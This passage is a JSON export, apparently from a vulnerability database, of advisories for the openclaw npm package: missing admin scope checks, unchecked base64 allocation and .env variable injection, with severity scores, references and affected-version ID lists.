                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7wv4-cc7p-jhxc",
                    "reference_id": "GHSA-7wv4-cc7p-jhxc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7wv4-cc7p-jhxc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110121?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.9",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-k8x3-9pv7-rfax"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-rvcq-rqbq-4khp"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9"
                }
            ],
            "aliases": [
                "CVE-2026-43531",
                "GHSA-7wv4-cc7p-jhxc"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "7.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pdmd-a4fg-8fcg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91444?format=api",
            "vulnerability_id": "VCID-pgdr-mvc3-2kg3",
            "summary": "OpenClaw's mutating internal ACP chat commands missed operator.admin scope enforcement\n## Summary\nMutating internal ACP chat commands missed the operator.admin gate that should separate read-only and mutating control-plane actions.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `229426a257e49694a59fa4e3895861d02a4d767f`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/auto-reply/reply/commands-acp.ts now requires operator.admin for mutating internal ACP actions.\n- src/auto-reply/reply/commands-acp.test.ts ships regression coverage for non-admin denial and admin success cases.\n\nOpenClaw thanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3w6x-gv34-mqpf",
                    "reference_id": "GHSA-3w6x-gv34-mqpf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3w6x-gv34-mqpf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-3w6x-gv34-mqpf"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pgdr-mvc3-2kg3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89157?format=api",
            "vulnerability_id": "VCID-psms-gauf-tkbz",
            "summary": "OpenClaw: Multiple Code Paths Missing Base64 Pre-Allocation Size Checks\n## Impact\n\nMultiple Code Paths Missing Base64 Pre-Allocation Size Checks.\n\nSeveral base64 decode paths could allocate before enforcing decoded-size limits.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=v2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42420",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16229",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.16177",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00051",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1622",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42420"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-ccx3-fw7q-rr2r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
